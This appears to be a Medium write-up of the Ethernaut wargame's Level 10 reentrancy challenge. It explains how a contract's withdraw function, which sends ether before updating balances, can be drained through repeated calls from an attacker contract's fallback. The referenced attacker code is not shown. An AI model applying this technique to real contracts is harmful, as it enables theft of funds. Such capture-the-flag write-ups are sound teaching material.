Ethernaut Level 10— Reentrancy

The Ethernaut is a Web3/Solidity based wargame inspired on overthewire.org. Here’s the solution to the Level 10— Reentrancy.

The goal of this level is for you to steal all the funds from the contract.Things that might help:-Untrusted contracts can execute code where you least expect it.
-Fallback methods
-Throw/revert bubbling
-Sometimes the best way to attack a contract is with another contract
-See the Help page above, section "Beyond the console"

The name of the challenge basically gives away the solution. The contract’s withdraw method is a classic example of a reentrancy vulnerability:

The vulnerability exists, because everytime a contract transfers ether to another contract, it gives away the control to recipient for a moment to call the receive or fallback function. An attacker can use that moment to call withdraw again. If recipient’s balance is not updated before actually transferring the funds, the withdraw will be called in a loop, until it drains all the ether from victim’s account.

Example of an attacker contract can be found below:

After compiling above contract, it can be deployed and called using the usual script:

That’s all. Above contract will drain all the ether from the victim. After that I can submit the challenge.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store